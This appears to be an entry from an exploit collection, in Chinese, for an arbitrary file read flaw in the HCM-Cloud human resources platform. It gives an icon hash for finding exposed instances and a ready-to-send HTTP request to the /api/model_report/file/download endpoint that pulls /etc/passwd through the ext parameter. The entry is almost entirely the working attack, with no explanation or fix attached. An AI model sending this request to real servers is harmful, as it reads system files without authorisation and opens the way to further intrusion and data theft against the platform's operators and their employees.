HCM-Cloud云端专业人力资源平台download任意文件读取漏洞
icon_hash="-859381597"
GET /api/model_report/file/download?index=/&ext=/etc/passwd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Connection: close